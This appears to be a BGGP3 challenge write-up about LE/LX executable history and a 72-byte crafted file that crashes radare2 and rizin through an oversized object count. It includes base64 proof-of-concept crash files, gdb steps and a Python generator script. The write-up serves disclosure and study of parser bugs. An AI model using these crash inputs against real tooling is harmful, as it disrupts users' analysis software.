BGGP3: LEMONADE.BIN


[:  :]

TODO Convert to markdown

https://n0.lol/lemonade/

In late 2020, the radare2 suite of tools was forked into a new project called rizin. Being a fork, they share much of the same codebase and are working with similar design paradigms for parsing and handling a wide variety of binary formats.

Since it’s been nearly 2 years of development for Rizin, there is enough of a difference between them that certain types of files are parsed better by one than the other. Other things like what information is output have changed.

For this year’s BGGP, I took a look at r2 and rizin in search of possible candidates for the smallest crash. My goal then became to find something that crashed both r2 and rizin in the fewest number of bytes. Several versions of r2 and rizin have come out since the start of the challenge, so I will focus on behaviors from [radare2 5.7.0](https://github.com/radareorg/radare2/releases/tag/5.7.0 and rizin 0.3.4, and note where things changed.

SIDE NOTE I found this 32 byte crash in the Xamarin LZ4 decompression part of radare2, but this bug was already reported and fixed in the version of r2 that came out shortly after BGGP3 began. This didn’t crash rizin when I tested.

POC (base64): WEFMWkYAAAAABCIA8gNNWpAAAwAAAAQAAAD//wAAuAA=

Tweet: https://twitter.com/netspooky/status/1552047700413235201

In the summer of 2021 I found a simple DOS for radare2 (CVE-2021-3673) by replacing the first byte of an ELF file with an L. I discuss this bug in tmp.0ut 2:3 https://tmpout.sh/2/3.html

When running my fuzzer I noticed this same thing came up again. This time, it seemed to crash both radare2 and rizin in the same way.

The base64 encoded PoC is as follows. You can grab a copy of rizin or radare2 and follow along.

TEVNT05BREUsIExVSCBMVUgsIExFTU9OQURFICAKTEVNT05BREUsIExVSCBMVUgsIExFTU9OQURFICAKDQBIRVkgQkdHUDMK

Hold up, what the heck even is LE/LX?

Before we got to enjoy the Portable Executables we know and love today, the format had somewhat of a long lineage, dating back as far as disk operating systems themselves.

In the DOS days, there were COM files, which were just pure machine code. No header, no sections, no relocations, just code.

Since everything happened in Real Mode, there wasn’t as much of a need for things like privilege levels, and memory was flat and entirely available to a given process. You could usually only execute one program at a time, so the operating system had to make sure that it set up each process consistently, and in an area that was known to contain process data. A COM file could reliably execute within this known environment, and registers would be set to default values given by the operating system. This environment was known as the Program Segment Prefix, and each OS had it’s own defaults.

As operating systems evolved, more control was required over the binaries that ran on the system. This was for both security, and general usability purposes. The MZ-DOS EXE format came out with MS-DOS 2.0, and was designed to support things like relocations, which gives the OS the ability to place code wherever it needs it to be. This is useful for things like linking, which gives way to DLLs that can extend the functionality of the program by using shared libraries that contain code reusable by any program on a given system.

NOTE: There were things such as DOS Extenders that gave the ability to enforce protections and use more advanced features while still running in real mode.

NOTE: PC DOS 1.0 (1981) had LINK.EXE and other .exe existed in MS-DOS 1.25 ( thanks Ange ! )

When Windows 1.0 came out, the “New Executable” format came with it. This was a 16 bit .exe that had even more configurability and allowed for more advanced linking and resource handling. To maintain backwards compatibility with DOS, it was placed after the MZ header with a small stub that would run in DOS mode if applicable. This is identical to how PE files are structured today.

Fun Fact! .FON and .FNT files are NE files.

File Example From https://www.chiark.greenend.org.uk/~sgtatham/fonts/

▶ yxd -f terminal.fon -s 0x170
00000000│4d5a 8b00 0100 0000│0400 1000 ffff 0000│MZ..............
00000010│0001 0000 0000 0000│4000 0000 0000 0000│........@.......
00000020│0000 0000 0000 0000│0000 0000 0000 0000│................
00000030│0000 0000 0000 0000│0000 0000 9000 0000│................
00000040│ba0e 000e 1fb4 09cd│21b8 014c cd21 5468│........!..L.!Th
00000050│6973 2069 7320 6e6f│7420 6120 7072 6f67│is is not a prog
00000060│7261 6d21 0d0a 466f│6e74 206c 6962 7261│ram!..Font libra
00000070│7279 2063 7265 6174│6564 2062 7920 6d6b│ry created by mk
00000080│7769 6e66 6f6e 742e│0d0a 2400 0000 0000│winfont...$.....
         /-- NE header at offset 0x90
00000090│4e45 050a 8c00 0200│0000 0000 0883 0000│NE.............. 
000000A0│0000 0000 0000 0000│0000 0000 0000 0000│................
000000B0│2000 4000 4000 8000│8c00 8c00 1e01 0000│ .@.@...........
000000C0│0000 0400 0000 0208│0000 0000 0000 0003│................
000000D0│0400 0780 0100 0000│0000 1400 1000 500c│..............P.
000000E0│3800 0000 0000 0880│0200 0000 0000 2400│8.............$.
000000F0│0c02 301c 0180 0000│0000 3002 4d02 301c│..0.......0.M.0.
00000100│0280 0000 0000 0000│0746 4f4e 5444 4952│.........FONTDIR
00000110│0854 6572 6d69 6e61│6c00 0000 0000 1c46│.Terminal......F
00000120│4f4e 5452 4553 2031│3030 2c39 362c 3936│ONTRES 100,96,96
00000130│203a 2054 6572 6d69│6e61 6c00 0000 0000│ : Terminal.....
00000140│0200 0100 0003 bd20│0000 5075 626c 6963│....... ..Public
00000150│2064 6f6d 6169 6e20│666f 6e74 2e20 2053│ domain font.  S
00000160│6861 7265 2061 6e64│2065 6e6a 6f79 2e00│hare and enjoy..

Introducing LE/LX

In the mid-80s, Microsoft had a partnership with IBM, who created OS/2 as a successor to their own PC DOS. As a result, the Linear Executable file format was created between them.

As both OSes evolved, the New Executable format was replaced in favor of a more versatile 32 bit format. There’s not that much information about that that I can find, but sometime around 1987 with the release of OS/2, Linear Executables became more common. LX with an MZ header was the default binary format for OS/2, and LE with a MZ header was used for user binaries on DOS and Windows 3.x. LE files were also used for VxD drivers for Windows 3.x until Windows 9.x.

The [PE format](https://docs.microsoft.com/en-us/archive/msdn-magazine/2002/february/inside-windows-win32-portable-executable-file-format-in-detail came out around 1993 with the release of Windows NT 3.1, and eventually became the standard. PE32+ came out with the first 64 bit Windows versions some time around 2005.

This is an example of an LX file, the date command for OS/2

From: http://cd.textfiles.com/hobbesos29411/BIN/DATE.EXE

▶ yxd -f DATE.EXE -s 0x100
00000000│4d5a 0000 0200 0000│0400 0000 ffff 0800│MZ..............
00000010│0002 0000 0000 0000│4000 0000 0000 0000│........@.......
00000020│0000 0000 0000 0000│0000 0000 0000 0000│................
00000030│0000 0000 0000 0000│0000 0000 8000 0000│................
00000040│0e1f ba0e 00b4 09cd│21b8 014c cd21 5468│........!..L.!Th
00000050│6973 2070 726f 6772│616d 2063 616e 6e6f│is program canno
00000060│7420 6265 2072 756e│2069 6e20 6120 444f│t be run in a DO
00000070│5320 7365 7373 696f│6e2e 0d0d 0a24 0000│S session....$..
00000080│4c58 0000 0000 0000│0200 0100 0100 0200│LX..............
00000090│1002 0000 0400 0000│0100 0000 0000 0000│................
000000A0│0500 0000 0080 0000│0010 0000 0900 0000│................
000000B0│0901 0000 0000 0000│a100 0000 0000 0000│................
000000C0│c400 0000 0500 0000│3c01 0000 0000 0000│........<.......
000000D0│0000 0000 0000 0000│5c01 0000 6401 0000│........\...d...
000000E0│0000 0000 0000 0000│6501 0000 7901 0000│........e...y...
000000F0│5b02 0000 0300 0000│6e02 0000 0000 0000│[.......n.......

This is an example of a VxD driver in the LE format. From: http://cd.textfiles.com/silvercollection/disc4/DRIVERS/19GXE.ARJ

▶ yxd -f VDDS3.386 -s 0x100
00000000│4d5a 3d00 4f00 0000│0400 0000 ffff 0000│MZ=.O...........
00000010│b800 0000 0000 0000│4000 0000 0000 0000│........@.......
00000020│0000 0000 0000 0000│0000 0000 0000 0000│................
00000030│0000 0000 0000 0000│0000 0000 8000 0000│................
00000040│0e1f ba0e 00b4 09cd│21b8 014c cd21 5468│........!..L.!Th
00000050│6973 2070 726f 6772│616d 2063 616e 6e6f│is program canno
00000060│7420 6265 2072 756e│2069 6e20 444f 5320│t be run in DOS 
00000070│6d6f 6465 2e0d 0a24│0000 0000 0000 0000│mode...$........
00000080│4c45 0000 0000 0000│0200 0400 0000 0000│LE..............
00000090│2080 0000 0a00 0000│0300 0000 0000 0000│ ...............
000000A0│0000 0000 0000 0000│0010 0000 0b00 0000│................
000000B0│080a 0000 0000 0000│8600 0000 0000 0000│................
000000C0│c400 0000 0300 0000│0c01 0000 0000 0000│................
000000D0│0000 0000 0000 0000│3401 0000 3f01 0000│........4...?...
000000E0│0000 0000 0000 0000│4a01 0000 7601 0000│........J...v...
000000F0│500b 0000 0000 0000│510b 0000 0000 0000│P.......Q.......

This is also an LE file! http://cd.textfiles.com/doomcompanion/DOOM/DOOM.EXE

Whew, who knew binaries would be so complicated?? Here’s a little chart showing the evolution of binary formats from COM to PE32+. Click on the names for more info. (You might have to zoom in!)

%%{init: {'theme':'dark'}}%%
flowchart TB
  classDef o fill:#123
  COM["COM (1974)
Originally for CP/M and DEC
VAX 16-bit, real-mode "]:::o MZ-DOS["MZ-DOS (1983)
For DOS 2.0. Contains 'MZ'
header, metadata, relocations"]:::o AOFF["AOFF (1977)
'Absolute Object File Format'
Intel internal format."]:::o OMF["OMF (1981)
'Relocatable Object Module
Format' By Intel, AKA .obj "]:::o CMD["CMD (1981)
For CP/M and other
DOS-like OS "]:::o NE["NE (1985)
'New Executable'. For
Windows 1.0 and OS/2 "]:::o LX["LX (1987)
'Linear Executable'
OS/2 2.0, 32 bit"]:::o LE["LE (1987)
'Linear Executable'
Mixed 16/32 bit,
Windows VxD Drivers
from 3.x-9.x, OS/2,
DOS extenders, user
Windows binaries."]:::o PE["PE (1993)
'Portable Executable'
32 bit, for Windows
NT 3.1 and later, and
many other platforms
like UEFI :) "]:::o PE32["PE32+ (2005)
64bit x86 PEs.
NOTE: 64 bit
architectures were
supported with PE,
but the format wasn't
updated until the
x86_64 version."]:::o AOUT["a.out (1971)
'Assembler Output'
First format for
Unix, PDP-7 and
PDP-11. Also used
in early Linux."]:::o COFF["COFF (1983)
'Common Object File Format'"]:::o ECOFF["ECOFF (1984)
'Extended COFF'
Designed for MIPS
on DEC Ultrix,
Tru64, SGI Irix,
Linux/MIPS, and
Net Yaroze"]:::o XCOFF["XCOFF (1986)
'eXtended COFF'
For AIX from IBM "]:::o ELF["ELF (1988)
Replaced COFF
in Unix SVR4"]:::o COM --> MZ-DOS COM --> CMD COM --> OMF AOFF --> OMF MZ-DOS --> NE NE --> LX NE --> LE LE --> PE PE --> PE32 AOUT --> COFF COFF --> ECOFF COFF --> XCOFF COFF --> ELF COFF --> PE

Understanding LE/LX Binaries

Now that we know some of the history, let’s get into the format.

It’s pretty typical of these early binary formats, with simple set up and pointers to different sections, as well as sizes and number of elements.

This layout can be thought of similarly to the PE format, with a pointer to it from inside the DOS header at offset 0x3C.

    +-----+-----+-----+-----+-----+-----+-----+-----+ 
00h | "L"   "X" |B-ORD|W-ORD|     FORMAT LEVEL      | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
08h | CPU TYPE  |  OS TYPE  |    MODULE VERSION     | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
10h |     MODULE FLAGS      |   MODULE # OF PAGES   | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
18h |     EIP OBJECT #      |          EIP          | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
20h |     ESP OBJECT #      |          ESP          | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
28h |       PAGE SIZE       |   PAGE OFFSET SHIFT   | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
30h |  FIXUP SECTION SIZE   | FIXUP SECTION CHECKSUM| 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
38h |  LOADER SECTION SIZE  |LOADER SECTION CHECKSUM| 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
40h |    OBJECT TABLE OFF   |  # OBJECTS IN MODULE  | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
48h | OBJECT PAGE TABLE OFF | OBJECT ITER PAGES OFF | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
50h | RESOURCE TABLE OFFSET |#RESOURCE TABLE ENTRIES| 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
58h | RESIDENT NAME TBL OFF |   ENTRY TABLE OFFSET  | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
60h | MODULE DIRECTIVES OFF | # MODULE DIRECTIVES   | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
68h | FIXUP PAGE TABLE OFF  |FIXUP RECORD TABLE OFF | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
70h | IMPORT MODULE TBL OFF | # IMPORT MOD ENTRIES  | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
78h |  IMPORT PROC TBL OFF  | PER-PAGE CHECKSUM OFF | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
80h |   DATA PAGES OFFSET   |    #PRELOAD PAGES     | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
88h | NON-RES NAME TBL OFF  | NON-RES NAME TBL LEN  | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
90h | NON-RES NAME TBL CKSM |   AUTO DS OBJECT #    | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
98h |    DEBUG INFO OFF     |    DEBUG INFO LEN     | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
A0h |   #INSTANCE PRELOAD   |   #INSTANCE DEMAND    | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
A8h |       HEAPSIZE        | 
    +-----+-----+-----+-----+ 

Within here is the Object Table, which points to a number of objects the LE needs to have set up in order to run.

    +-----+-----+-----+-----+-----+-----+-----+-----+ 
00h |     VIRTUAL SIZE      |    RELOC BASE ADDR    | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
08h |     OBJECT FLAGS      |    PAGE TABLE INDEX   | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
10h |  # PAGE TABLE ENTRIES |       RESERVED        | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 

The Object Page Table is the element of the Object Table which directly relate to objects to load and their associated sizes and flags.

   63                     32 31       16 15         0 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 
00h |    PAGE DATA OFFSET   | DATA SIZE |   FLAGS   | 
    +-----+-----+-----+-----+-----+-----+-----+-----+ 

These structures will be handy to know later on.

How LE files are parsed

So we know that LE files follow the typical parsing mechanism required for PEs and other similar binaries. We also know that they have relative offsets and are pointed to by the MZ header. This means that a good parser will be able to seek to this offset and parse LE independently of the header that came before it.

When a binary is loaded into rizin or radare 2, it is read by the program and processed as close to the spec as possible.

This is the path it takes in Rizin (per 0.3.4 source but the logic is roughly the same throughout) once the initial loading of the file and other environment checks are done.

  1. rz_bin_open_buf
  1. rz_bin_file_new_from_buffer
  1. rz_bin_object_new
  1. rz_bin_object_set_items
  1. rz_bin_maps_of_file_sections
  1. rz_bin_le_get_sections

Let’s debug and see what happens!!

Debugging the parser

Our buffer is as follows:

00000000│4c45 4d4f 4e41 4445│2c20 4c55 4820 4c55│LEMONADE, LUH LU
00000010│482c 204c 454d 4f4e│4144 4520 200a 4c45│H, LEMONADE  .LE
00000020│4d4f 4e41 4445 2c20│4c55 4820 4c55 482c│MONADE, LUH LUH,
00000030│204c 454d 4f4e 4144│4520 200a 0d00 4845│ LEMONADE  ...HE
00000040│5920 4247 4750 330a│                   │Y BGGP3.

Get set up with the debugger:

$ gdb --args /home/user/rizin/rizin-0.3.4/build/binrz/rz-bin/rz-bin -I lemonade.bin
...
gef➤  start
gef➤  break rz_bin_le_get_sections
gef➤  continue
gef➤  break 344 

At this point, we are just after the check that the section was properly allocated. LEt’s examine the state of our object.

This is the header that rizin now has internally.

gef➤  p *h
$1 = {
  magic = "LE",
  border = 0x4d,
  worder = 0x4f,
  level = 0x4544414e,
  cpu = 0x202c,
  os = 0x554c,
  ver = 0x554c2048,
  mflags = 0x4c202c48,
  mpages = 0x4e4f4d45,
  startobj = 0x20454441,
  eip = 0x454c0a20,
  stackobj = 0x414e4f4d,
  esp = 0x202c4544,
  pagesize = 0x2048554c,
  pageshift = 0x2c48554c,
  fixupsize = 0x4d454c20,
  fixupsum = 0x44414e4f,
  ldrsize = 0xa202045,
  ldrsum = 0x4548000d,
  objtab = 0x47422059,
  objcnt = 0xa335047,
  objmap = 0x0,
  itermap = 0x0,
  rsrctab = 0x0,
  rsrccnt = 0x0,
  restab = 0x0,
  enttab = 0x0,
  dirtab = 0x0,
  dircnt = 0x0,
  fpagetab = 0x0,
  frectab = 0x0,
  impmod = 0x0,
  impmodcnt = 0x0,
  impproc = 0x0,
  pagesum = 0x0,
  datapage = 0x0,
  preload = 0x0,
  nrestab = 0x0,
  cbnrestab = 0x0,
  nressum = 0x0,
  autodata = 0x0,
  debuginfo = 0x0,
  debuglen = 0x0,
  instpreload = 0x0,
  instdemand = 0x0,
  heapsize = 0x0,
  stacksize = 0x0
}

The very last member h->objcnt has 0xa335047 entries. This coincides with the “GP3\n” at the end of the PoC file.

Rizin will now try to allocate 0xa335047 new objects to copy data from the file into memory. This is of course, not ideal.

I originally found a bug in the same part of the code, but using the Object Page Table entries to cause a large number of object allocations rivaling that of modern applications such as Slack. This bug was further into the loop and required a larger file size, so I experimented with using a huge value in the objcnt header field to reduce the file size. This resulted in triggering the bug earlier in the loop, and the program didn’t reject it based on it’s size being smaller than the allocated header object.

Sadly this won’t result in code execution, but it does have the same effect on other versions of Radare2 and Rizin, which achieves my initial goal.

The script I used to generate and test the PoC file is as follows:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import struct
import sys
import hashlib

def writeBin(b,h):
    outfile = h + ".bin"
    f = open(outfile,'wb')
    f.write(b)
    f.close()
    print(outfile)

b =  b""
b += b"LE"    # 00h -- Signature
b += b"MO"    # 02h -- B-ORD/W-ORD
b += b"NADE"  # 04h -- Format Level
b += b", "    # 08h -- CPU Type
b += b"LU"    # 0Ah -- OS Type
b += b"H LU"  # 0Ch -- Module Version
b += b"H, L"  # 10h -- Module Flags
b += b"EMON"  # 14h -- Module # of pages
b += b"ADE "  # 18h -- EIP Object
b += b" \nLE" # 1Ch -- EIP
b += b"MONA"  # 20h -- ESP Object #
b += b"DE, "  # 24h -- ESP
b += b"LUH "  # 28h -- Page Size
b += b"LUH,"  # 2Ch -- Page Offset Shift
b += b" LEM"  # 30h -- Fixup Section Size
b += b"ONAD"  # 34h -- Fixup Section Checksum
b += b"E  \n" # 38h -- Loader Section Size
b += b"\r\x00HE" # 3Ch -- Loader Section Checksum
b += b"Y BG"  # 40h --Object Table Offset
b += b"GP3\n" # 44h --Object Count

m = hashlib.sha256()
m.update(b)
shorthash = m.digest().hex()[0:8]
writeBin(b,shorthash)

Scoring

File Size: 72

4096 -   72 = 4024
     + 1024 = 5048 (Additional points for writeup)

Final Score: 5048

This is currently being patched: https://github.com/rizinorg/rizin/issues/2993

End

My BGGP3 entry was a lot different than what I originally planned. I found two other really cool things that I want to explore more in depth, so this was my backup. I am really happy to see how many people did their own projects this year. The goal was to challenge you to explore things that you might not normally look into, and give people a reason to go deep with things that most people would just consider an annoyance.

Shoutout: gren, xcellerator, hermit, dnz, Ange Albertini and qkumba for the ancient wisdom, tmp.0ut, and everyone who did BGGP